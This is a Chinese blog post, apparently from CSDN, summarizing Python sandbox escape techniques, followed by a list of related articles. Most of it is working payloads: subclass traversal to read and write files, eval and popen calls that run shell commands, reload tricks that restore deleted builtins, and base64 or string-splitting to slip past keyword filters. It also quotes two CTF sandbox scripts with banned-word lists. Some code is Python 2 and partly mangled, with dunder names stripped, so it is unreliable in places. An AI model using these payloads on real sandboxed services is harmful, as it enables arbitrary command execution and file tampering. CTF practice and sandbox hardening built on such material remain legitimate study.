php 沙箱逃逸,python沙箱逃逸小结

最新推荐文章于 2022-07-29 14:31:54 发布
最新推荐文章于 2022-07-29 14:31:54 发布
阅读量105 收藏
点赞数
文章标签: php 沙箱逃逸

之前碰到了flask模板的漏洞的时候接触过python的一些东西,之前没时间去细看,现在看感觉很强悍,简单总结一下

首先我们不说原理了,也不是太明白,我们直接讲利用,一些python好玩的特性

1.内联函数

python的内敛函数真是强大,可以调用一切函数做自己想做的事情

__builtins__

__import__

我们输入

dir('builtins')

发现如下

ea78e74330706b392f9ca878d0dfa762.png

我们在python的object类中集成了很多的基础函数,我们想要调用的时候也是需要用object去操作的,现在小小总结了两种创建object的方法如下

().__class__.__bases__[0]

''.__class__.__mro__[2]

验证如下

>>> print ''.__class__.__mro__[2]

'object'>

>>> print ().__class__.__bases__[0]

'object'>

然后我们看一下

444c951ff47db5aa299795c2e7fa6bff.png

存在一个hook函数,直接可以调用

c729bd932652a002c99053c9bd0d983a.png

存在file类型的object,事实上调用后可以对文件操作了

利用代码如下

//读文件

().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()

//写文件

().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')

//执行任意命令

().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )

2.python中可以执行任意代码的神奇函数

(1)timeit

import timeit

timeit.timeit("__import__('os').system('dir')",number=1)

(2)exec 和eval 比较经典了

eval('__import__("os").system("dir")')

(3)platform

import platform

print platform.popen('dir').read()

(4)random和math

(暂时没找到)

3.一些简单攻击总结

(1)reload方法

>>>del __builtins__.__dict__['__import__'] # __import__ is the function called by the import statement

>>>del __builtins__.__dict__['eval'] # evaluating code could be dangerous

>>>del __builtins__.__dict__['execfile'] # likewise for executing the contents of a file

>>>del __builtins__.__dict__['input'] # Getting user input and evaluating it might be dangerous

看似删除了函数,但是没有过滤reload函数

reload(__builtins__)

即可恢复

(2)寻找替代函数

我们在最开始的介绍本质上就是找到了__builtins__的file属性的替代函数,可以直接进行文件操作,包括后面的任意命令执行也是找到了替代函数

(3)加密解密绕过字符串过滤

有可能前端是个web界面,过滤关键词,这里可以用encode什么尝试过滤,如下

>>>import base64

>>>base64.b64encode('__import__')

'X19pbXBvcnRfXw=='

>>>base64.b64encode('os')

'b3M='

然后可以构造

>>> __builtins__.__dict__['X19pbXBvcnRfXw=='.decode('base64')]('b3M='.decode('base64'))

或者利用python对字符串处理的便利绕过,例如

[x for x in [].class.base.subclasses() if x.name == 'catch_warnings'][0].init.func_globals['linecache'].dict['o'+'s'].dict['sy'+'stem']('echo Hello SandBox')

4.收集的一些小题目

#!/usr/bin/env python

from future import print_function

print("Welcome to my Python sandbox! Enter commands below!")

banned = [

"import",

"exec",

"eval",

"pickle",

"os",

"subprocess",

"kevin sucks",

"input",

"banned",

"cry sum more",

"sys"

]

targets = builtins.dict.keys()

targets.remove('raw_input')

targets.remove('print')

for x in targets:

del builtins.dict[x]

while 1:

print(">>>", end=' ')

data = raw_input()

for no in banned:

if no.lower() in data.lower():

print("No bueno")

break

else: # this means nobreak

exec data

def make_secure():

UNSAFE = ['open',

'file',

'execfile',

'compile',

'reload',

'__import__',

'eval',

'input']

for func in UNSAFE:

del __builtins__.__dict__[func]

from re import findall

# Remove dangerous builtins

make_secure()

print 'Go Ahead, Expoit me >;D'

while True:

try:

# Read user input until the first whitespace character

inp = findall('\S+', raw_input())[0]

a = None

# Set a to the result from executing the user input

exec 'a=' + inp

print 'Return Value:', a

except Exception, e:

print 'Exception:', e

应该比较粗糙,欢迎批评指正,或者大佬指点补充一下~

Henley Liang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php 沙箱逃逸,Python沙箱逃逸
weixin_36243739的博客
03-28 175
之前接触的大部分是PHP写的服务器端,而除了PHPPython也可以作为服务器端的语言,利用的是Python的flask模块渲染html模板,同时也可能存在Python语句执行的漏洞,这就是SSTI漏洞,即服务器端模板注入,本篇文章通过网鼎杯的两道SSTI题简单学习了解一下Python沙箱逃逸的原理网鼎杯第二场Web:calc题目如下,是一个计算器,可以执行一些简单的算式,根据题目的提示,可能对...
php 沙箱逃逸,Python沙箱逃逸之基础篇
weixin_42299244的博客
03-28 306
0x01 前言周末去参加了一波国赛的半决赛,发现全部都是python的题,之前还以为会有人把模版改成php的呢,结果都没有。。对于python也不是很熟悉,所以回来之后学习一下。0x02 Python一般的利用方式一般python沙箱的话都是可以执行python命令的一个环境,因此我们需要知道一些敏感的函数来帮助我们getshell或者读取敏感文件等等执行系统命令12345os.system('w...
LNMP虚拟主机PHP沙盒逃逸
Coisini的博客
06-12 368
并不只是针对Lnmp的沙盒逃逸,而是.user.ini的设计缺陷达到绕过open_basedir限制,所以是通用的方法。首先来看看最新版LNMP是怎么配置open_basedir的: open_basedir=/home/wwwroot/default:/tmp/:/proc/ lsattr .user.ini ----i----------- .user.ini LNMP的open_ba...
php沙盒绕过,GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)
weixin_30317869的博客
03-21 223
POST /index.php HTTP/1.1Host: targetAccept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: close...
沙箱逃逸技术
jackey3Lin的专栏
11-21 9246
沙箱技术实现特点    (((本文仅仅讨论沙箱逃逸技术问题,不涉及高大上的架构性问题及APT防御性问题,避免问题的无限扩大化。))) 用沙箱动态行为分析检测malware是近几年补充传统AV杀软的通用技术,但是各厂商对沙箱的实现方式和检测方案设计不尽相同,单纯从沙箱角度看,基本分为虚拟化和仿真模拟两大类,然后会在这两种的基础上加上内存分析或者多系统多沙箱联合分析,其中云查杀,信誉,流量检测等本
沙箱逃逸练习题python源码
02-13
里面是近十道python逃逸题目的python源码,在python环境中运行既可以进入题目环境。 可以查看我写的沙箱逃逸的博客结合练习 https://blog.csdn.net/qq_43390703/article/details/104256001
沙箱逃逸:来自安全软件的鼎力相助.pdf
08-07
沙箱已经成为现代安全技术的重要组成部分。Microsoft Windows 8.1 和 Windows 10 集成了若干新的缓解措施和安全边界,显著提升了应用层沙箱的安全性,降低了代码执行漏洞所造成的直接危害。然而第三方软件也是 ...
沙箱逃逸技术总结.ppt
07-25
无论是哪种沙箱技术,总归无法和真实环境比拟,所以沙箱逃避技术在高级别病毒样本已经普遍存在,并且逃避技术也在逐渐更新。 下面总结下当前的逃避技术,我分为两个特点进行分析。 ·针对虚拟机检测 ·针对沙箱分析...
沙箱逃逸技术总结
09-11
沙箱逃逸技术总结。
Flask SSTI/沙箱逃逸的一些总结
01-20
0x01 沙箱逃逸原理 沙盒/沙箱沙箱在早期主要用于测试可疑软件、病毒危害程度等。在沙箱中运行,即使病毒对其造成严重危害,也不会威胁到真实环境。类似于虚拟机的利用。 内建函数 ​ 当启动python解释器时,即使...
php沙盒绕过,使用OpCode绕过Python沙箱的方法详解
weixin_30990821的博客
03-21 186
0x01 OpCodeopcode又称为操作码,是将python源代码进行编译之后的结果,python虚拟机无法直接执行human-readable的源代码,因此python编译器第一步先将源代码进行编译,以此得到opcode。例如在执行python程序时一般会先生成一个pyc文件,pyc文件就是编译后的结果,其中含有opcode序列。如何查看一个函数的OpCode?def a():if 1 ==...
CVE-2022-0543 Redis沙盒逃逸漏洞
weixin_45715461的博客
07-01 3536
CVE-2022-0543 Redis沙盒逃逸漏洞
python沙箱逃逸一些套路的小结
Sp4rkW的博客
05-21 9801
前言 总结一下各大赛事中的沙箱逃逸题,感觉还是很好玩的~ 先说一下自己对于这种沙箱逃逸题的理解吧,关键在于绕过,一般就是逼你用一些特别的操作去绕过他ban掉的函数,得到flag 空说无意,我们直接来看比赛中的一些题目~ 2018 ciscn(国赛)题RUN 它过滤了一些危险函数,比如:os、sys等等,但我们可以通过类的继承关系找到被ban掉的库,然后将它导入进来。比如: ().__c...
php 沙箱逃逸,浅析Python SSTI/沙盒逃逸
weixin_39535283的博客
03-28 539
前言之前也接触过什么是SSTI,但大多以题目进行了解,很多模块以及payload都不了解其意就直接拿过来用,感觉并没有学到什么东西,最主要的是在绕过的过程中,不清楚原理没有办法构造,这次就好好来学习一下原理以及姿势一、基础知识0x00:沙盒逃逸沙箱逃逸,就是在一个代码执行环境下(Oj或使用socat生成的交互式终端),脱离种种过滤和限制,最终成功拿到shell权限的过程0x01:python的内建...
有关沙盒逃逸的两道题目
playmaker的博客
06-11 1090
有关沙盒逃逸的两道题目 1.BCTF-2017 Monkey 拿到题目给了一个js文件,是一个模拟终端的程序。输入os.system(’/bin/sh’),即可拿到shell. 2.CUIT-2017 这题就没上一题那么容易。 输入os.system(’/bin/sh’)函数被检测出,应该是启用了字符串过滤 ''和.都被过滤,但是system没有过滤,此时我们可以使用getattr 来进行g...
python沙箱逃逸总结
weixin_44576725的博客
04-14 3805
python沙箱逃逸总结 让用户提交 Python 代码并在服务器上执行,是一些 OJ、量化网站重要的服务,很多 CTF 也有类似的题。为了不让恶意用户执行任意的 Python 代码,就需要确保 Python 运行在沙箱中。沙箱经常会禁用一些敏感的函数,例如 os,研究怎么逃逸、防护这类沙箱还是蛮有意思的。 前言 Python沙箱逃逸的最终目标就是执行系统任意命令,次一点的写文件,再次一点的读文件。 顺便安利一本书:《流畅的 Python》。这本书有很多中高阶知识点,很全面而且讲的很清楚,如果你看过,相
利用Python渗透实现沙箱逃逸,看黑客是如何绕过网站的防护的?
最新发布
Yuki1127918的博客
07-29 1333
Python沙箱逃逸的最终目标就是执行系统任意命令,次一点的写文件,再次一点的读文件。接下来的内容先讲系统命令执行,再讲文件写入、读取,并且均以oj为例,库大多以os为例。
各种姿势解析-python沙箱逃逸
qq_43390703的博客
09-07 2243
目录1.预备内容python中内置执行系统命令的模块:subprocessoscommandstimeitpaltformpty可执行系统命令的函数两个魔术方法python中可以执行任意代码的函数导入os或sys的库2. 沙箱逃逸花式import花式处理字符串恢复sys.modules花式执行函数通过继承关系逃逸文件读写其他3.小结/思路4.实例1. ISCC 2016 Pwn300 pycalc2.__ future _3.hackuctf 20124.future5.cuit2017payload集锦5

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值